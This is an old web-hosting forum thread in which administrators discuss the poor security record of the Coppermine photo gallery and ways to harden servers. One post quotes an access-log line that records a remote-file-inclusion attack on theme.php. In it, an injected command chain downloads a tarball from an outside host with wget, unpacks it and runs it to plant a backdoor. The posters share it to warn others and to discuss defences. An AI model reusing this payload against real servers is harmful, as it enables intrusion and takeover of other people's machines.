Coppermine Application Vault package!!!!!!!

[VagrantHost]

i don't understand why noone has put out a package for Coppermine. it is by far the best gallery. tons of people seem to want it.

someone needs to create this as an App Vault package!

 

[Traged1]

It is probably that Coppermine has historically been linked to so many rootings of boxes that its hard to see why it is still in production. Many admins are afraid to have such scripts on thier servers as they probably already got burnt or know someone who has been rooted through coppermine.

 

[faris]

Oh great. I've banned the use of phpbb and nuke, so do I need to ban coppermine too? Bah :-(

Faris.

 

[Traged1]

No, but you must make sure you keep it up to date completely or risk getting rooted.

 

[Herby]

coppermine - HAHAHAHAHA
this comes directly after PHPNuke in point of security.

look on my yesterdays log:

202.95.145.102 - - [26/Mar/2005:17:59:10 +0100] "GET modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.geocities.com/hendra_juzt/inject.txt?&cmd=uname%20-a;id;cd%20/var/tmp;wget%20makassar.us/ary.tar.gz;tar%20zxvf%20ary.tar.gz;cd%20.psy;./config%20REMON%202222;./****;./run HTTP/1.1" 200 12655 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

if i hadnt secured my tmp i would have been compromised now.

ps: you are free to block this ip in your firewall

 

[faris]

Indeed!

Restricting wget (chmod 700) would also have stopped it in its tracks, I think?

Faris.

 

[Herby]

Originally posted by faris
Indeed!

Restricting wget (chmod 700) would also have stopped it in its tracks, I think?

Faris.

yep

many reasons I am happy of RHEL4 with SELinux - waiting for plesk to respond with a new release for it